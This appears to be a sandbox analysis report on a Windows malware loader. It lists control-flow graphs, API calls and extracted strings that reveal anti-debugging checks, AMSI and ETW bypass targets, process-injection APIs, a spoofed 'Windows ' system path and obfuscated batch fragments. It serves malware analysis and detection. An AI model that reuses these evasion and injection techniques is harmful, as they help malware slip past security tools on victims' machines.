28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 285e974 call 284480c call 284494c call 28446a4 call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 2847e10 3359->3377 3879 286964e-286984f call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 28449a4 call 2858ba8 3377->3879 3880 286939c-2869649 call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 2844d8c * 2 call 2844734 call 285df00 3377->3880 3396->3397 3584 2868404-2868724 call 28449a4 call 285e0c4 call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 285cf9c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c 3397->3584 3585 28683ff-2868402 3397->3585 3951 286626f-28664c8 call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 2844d20 call 2844d8c call 2844734 call 285df00 3580->3951 3952 28664cd-2866bf0 call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 28436a0 call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 2842f08 call 2847944 call 2844798 call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 2842f08 call 2847944 call 2844798 call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 28436d0 3580->3952 4211 2868726-2868738 call 285857c 3584->4211 4212 286873d-2868f20 call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c ResumeThread call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c CloseHandle call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 2857ecc call 2858798 * 6 CloseHandle call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c 3584->4212 3585->3584 4489 2867c8d-2867ca4 call 28436d0 3850->4489 3851->3850 3876->3877 4675 28649c6-2864a1c call 285e5cc call 2844d8c call 2844734 call 2844d8c call 285df00 3877->4675 4676 2864a21-2864c7a call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 2858704 call 284480c call 284494c call 28446a4 call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 2858704 call 2847e10 3877->4676 3879->3358 3880->3879 3951->3952 4211->4212 4212->3122 4675->4676 4958 2864cd7-28650a7 call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 2858704 call 284494c call 2858408 Sleep call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 2844d20 call 285de78 call 2844d20 call 285de78 call 284480c call 284494c * 2 MoveFileA call 284480c call 284494c * 2 MoveFileA call 284494c call 2844d20 call 285de78 call 284494c call 2844d20 call 285de78 call 284494c call 2844d20 call 285de78 4676->4958 4959 2864c7c-2864cd2 call 285e5cc call 2844d8c call 2844734 call 2844d8c call 285df00 4676->4959 4958->2013 4959->4958
                        APIs
                        • InetIsOffline.URL(00000000,00000000,0286B3D5,?,?,?,000002F7,00000000,00000000), ref: 0285F0E2
                          • Part of subcall function 0285881C: LoadLibraryA.KERNEL32(00000000,00000000,02858903), ref: 02858850
                          • Part of subcall function 0285881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02858903), ref: 02858860
                          • Part of subcall function 0285881C: GetProcAddress.KERNEL32(75380000,00000000), ref: 02858879
                          • Part of subcall function 0285881C: FreeLibrary.KERNEL32(75380000,00000000,028A2388,Function_000065D8,00000004,028A2398,028A2388,000186A3,00000040,028A239C,75380000,00000000,00000000,00000000,00000000,02858903), ref: 028588E3
                          • Part of subcall function 0285EFC8: GetModuleHandleW.KERNEL32(KernelBase,?,0285F3CC,UacInitialize,028A237C,0286B40C,UacScan,028A237C,0286B40C,ScanBuffer,028A237C,0286B40C,OpenSession,028A237C,0286B40C,ScanString), ref: 0285EFCE
                          • Part of subcall function 0285EFC8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0285EFE0
                          • Part of subcall function 0285F024: GetModuleHandleW.KERNEL32(KernelBase), ref: 0285F034
                          • Part of subcall function 0285F024: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0285F046
                          • Part of subcall function 0285F024: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0285F05D
                          • Part of subcall function 02847E10: GetFileAttributesA.KERNEL32(00000000,?,0285FD00,ScanString,028A237C,0286B40C,OpenSession,028A237C,0286B40C,ScanString,028A237C,0286B40C,UacScan,028A237C,0286B40C,UacInitialize), ref: 02847E1B
                          • Part of subcall function 0284C2E4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,029968C8,?,02860032,ScanBuffer,028A237C,0286B40C,OpenSession,028A237C,0286B40C,ScanBuffer,028A237C,0286B40C,OpenSession), ref: 0284C2FB
                          • Part of subcall function 0285DFE4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0285E0B4), ref: 0285E01F
                          • Part of subcall function 0285DFE4: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0285E0B4), ref: 0285E04F
                          • Part of subcall function 0285DFE4: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0285E064
                          • Part of subcall function 0285DFE4: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0285E090
                          • Part of subcall function 0285DFE4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0285E099
                          • Part of subcall function 02847E34: GetFileAttributesA.KERNEL32(00000000,?,02862E7D,ScanString,028A237C,0286B40C,OpenSession,028A237C,0286B40C,ScanBuffer,028A237C,0286B40C,OpenSession,028A237C,0286B40C,Initialize), ref: 02847E3F
                          • Part of subcall function 02847FC8: CreateDirectoryA.KERNEL32(00000000,00000000,?,0286301B,OpenSession,028A237C,0286B40C,ScanString,028A237C,0286B40C,Initialize,028A237C,0286B40C,ScanString,028A237C,0286B40C), ref: 02847FD5
                          • Part of subcall function 0285DF00: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0285DFD2), ref: 0285DF3F
                          • Part of subcall function 0285DF00: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0285DF79
                          • Part of subcall function 0285DF00: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0285DFA6
                          • Part of subcall function 0285DF00: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0285DFAF
                          • Part of subcall function 02858798: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,028A23A4,0285A3BF,ScanString,028A23A4,0285A774,ScanBuffer,028A23A4,0285A774,Initialize,028A23A4,0285A774,UacScan), ref: 028587AC
                          • Part of subcall function 02858798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028587C6
                          • Part of subcall function 02858798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,028A23A4,0285A3BF,ScanString,028A23A4,0285A774,ScanBuffer,028A23A4,0285A774,Initialize), ref: 02858802
                          • Part of subcall function 02858704: LoadLibraryW.KERNEL32(amsi), ref: 0285870D
                          • Part of subcall function 02858704: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 0285876C
                        • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,028A237C,0286B40C,OpenSession,028A237C,0286B40C,ScanBuffer,028A237C,0286B40C,OpenSession,028A237C,0286B40C,0286B764), ref: 02864DEB
                          • Part of subcall function 0285DE78: RtlInitUnicodeString.NTDLL(?,?), ref: 0285DEA0
                          • Part of subcall function 0285DE78: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0285DEF2), ref: 0285DEB6
                          • Part of subcall function 0285DE78: NtDeleteFile.NTDLL(?), ref: 0285DED5
                        • MoveFileA.KERNEL32(00000000,00000000), ref: 02864FEB
                        • MoveFileA.KERNEL32(00000000,00000000), ref: 02865041
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: File$LibraryPath$AddressModuleNameProc$FreeHandleLoadName_$AttributesCloseCreateMove$CheckDebuggerDeleteDirectoryInetInformationInitOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                        • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                        • API String ID: 2010126900-181751239
                        • Opcode ID: 46e6e36125bed36d5bfc3493105d554f9cb2349c49ff9794fa1a4688b9743f3e
                        • Instruction ID: 17a00392180701df365a5198dd7cd3a8359059971610c2b2b9debc96f2697bc7
                        • Opcode Fuzzy Hash: 46e6e36125bed36d5bfc3493105d554f9cb2349c49ff9794fa1a4688b9743f3e
                        • Instruction Fuzzy Hash: C3240B3DA1011C8BEB10EB68DD81BEE73B6FF95304F1081A1E409E7655DE74AE868F16
                        Function 02845A78 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 5547 2845a78-2845ab9 GetModuleFileNameA RegOpenKeyExA 5548 2845afb-2845b3e call 28458b4 RegQueryValueExA 5547->5548 5549 2845abb-2845ad7 RegOpenKeyExA 5547->5549 5556 2845b40-2845b5c RegQueryValueExA 5548->5556 5557 2845b62-2845b7c RegCloseKey 5548->5557 5549->5548 5550 2845ad9-2845af5 RegOpenKeyExA 5549->5550 5550->5548 5552 2845b84-2845bb5 lstrcpynA GetThreadLocale GetLocaleInfoA 5550->5552 5554 2845c9e-2845ca5 5552->5554 5555 2845bbb-2845bbf 5552->5555 5560 2845bc1-2845bc5 5555->5560 5561 2845bcb-2845be1 lstrlenA 5555->5561 5556->5557 5558 2845b5e 5556->5558 5558->5557 5560->5554 5560->5561 5562 2845be4-2845be7 5561->5562 5563 2845bf3-2845bfb 5562->5563 5564 2845be9-2845bf1 5562->5564 5563->5554 5566 2845c01-2845c06 5563->5566 5564->5563 5565 2845be3 5564->5565 5565->5562 5567 2845c30-2845c32 5566->5567 5568 2845c08-2845c2e lstrcpynA LoadLibraryExA 5566->5568 5567->5554 5569 2845c34-2845c38 5567->5569 5568->5567 5569->5554 5570 2845c3a-2845c6a lstrcpynA LoadLibraryExA 5569->5570 5570->5554 5571 2845c6c-2845c9c lstrcpynA LoadLibraryExA 5570->5571 5571->5554
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02840000,0286E790), ref: 02845A94
                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02840000,0286E790), ref: 02845AB2
                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02840000,0286E790), ref: 02845AD0
                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02845AEE
                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02845B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02845B37
                        • RegQueryValueExA.ADVAPI32(?,02845CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02845B7D,?,80000001), ref: 02845B55
                        • RegCloseKey.ADVAPI32(?,02845B84,00000000,?,?,00000000,02845B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02845B77
                        • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02845B94
                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02845BA1
                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02845BA7
                        • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02845BD2
                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02845C19
                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02845C29
                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02845C51
                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02845C61
                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02845C87
                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02845C97
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                        • API String ID: 1759228003-2375825460
                        • Opcode ID: 8c30737a48ad2055d61732a3069e4d20a9ce3e1052864a4a611988a72c7e285a
                        • Instruction ID: 0c978e5b48fcefc32cf67085fb93bf9fee7babf092adc09857e1d6e228243065
                        • Opcode Fuzzy Hash: 8c30737a48ad2055d61732a3069e4d20a9ce3e1052864a4a611988a72c7e285a
                        • Instruction Fuzzy Hash: 6B51697DA4025C7FFB21D6A8CC46FEF77AD9B14744F8001A1AA08E6181DF789B848F65
                        Function 0285F024 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 5647 285f024-285f03e GetModuleHandleW 5648 285f040-285f052 GetProcAddress 5647->5648 5649 285f06a-285f072 5647->5649 5648->5649 5650 285f054-285f064 CheckRemoteDebuggerPresent 5648->5650 5650->5649 5651 285f066 5650->5651 5651->5649
                        APIs
                        • GetModuleHandleW.KERNEL32(KernelBase), ref: 0285F034
                        • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0285F046
                        • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0285F05D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                        • String ID: CheckRemoteDebuggerPresent$KernelBase
                        • API String ID: 35162468-539270669
                        • Opcode ID: 2d3ad8ec9abc7c49cc928f812b2f0db416b462aeb66c6c72c203965bbb715ba9
                        • Instruction ID: ba3e1869173f1b0a2532a6a2a63ef3b7ca9384fc7f5e3e7c82748dfb028f46c1
                        • Opcode Fuzzy Hash: 2d3ad8ec9abc7c49cc928f812b2f0db416b462aeb66c6c72c203965bbb715ba9
                        • Instruction Fuzzy Hash: 77F0A73C90427CABDB10B6A888887DDFBB95F27328F6843D4A929E25C2E7750684C651
                        Function 0285DFE4 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 02844ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02844EDA
                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0285E0B4), ref: 0285E01F
                        • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0285E0B4), ref: 0285E04F
                        • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0285E064
                        • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0285E090
                        • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0285E099
                          • Part of subcall function 02844C0C: SysFreeString.OLEAUT32(0285ED84), ref: 02844C1A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                        • String ID:
                        • API String ID: 1897104825-0
                        • Opcode ID: 5fe3bcf56b942f52949e16dd30a063aef5fc8647b0fcc6aba638654b302acbbc
                        • Instruction ID: a480ef04f48a40100bd4336c9c5f14f6b7b3f7740284530bbd28582e1cc22b1a
                        • Opcode Fuzzy Hash: 5fe3bcf56b942f52949e16dd30a063aef5fc8647b0fcc6aba638654b302acbbc
                        • Instruction Fuzzy Hash: 7B21A47D65031C7BEB51EAD8CC46FDE77BDAB48704F500461B600F71C0DAB4AA458B56
                        Function 0285E72C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0285E86A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: CheckConnectionInternet
                        • String ID: Initialize$OpenSession$ScanBuffer
                        • API String ID: 3847983778-3852638603
                        • Opcode ID: e0d07639a46e87bfb4ddf8e88c40c815d609e2aac49c53e4ab7481b0ce3da32b
                        • Instruction ID: 20f7e16ad3d95b4e5a7f46876ffea80b5cd91223e566a772a571f158acb71ffa
                        • Opcode Fuzzy Hash: e0d07639a46e87bfb4ddf8e88c40c815d609e2aac49c53e4ab7481b0ce3da32b
                        • Instruction Fuzzy Hash: 8C41FF3DA1021C9BEB10EBA8DC81B9E77FAEF49710F214425E841E7655DE78AE058F11
                        Function 02857CF8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 02858018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02858088,?,?,00000000,?,028579FE,ntdll,00000000,00000000,02857A43,?,?,00000000), ref: 02858056
                          • Part of subcall function 02858018: GetModuleHandleA.KERNELBASE(?), ref: 0285806A
                          • Part of subcall function 028580C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02858148,?,?,00000000,00000000,?,02858061,00000000,KernelBASE,00000000,00000000,02858088), ref: 0285810D
                          • Part of subcall function 028580C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02858113
                          • Part of subcall function 028580C0: GetProcAddress.KERNEL32(?,?), ref: 02858125
                        • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02857D6C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
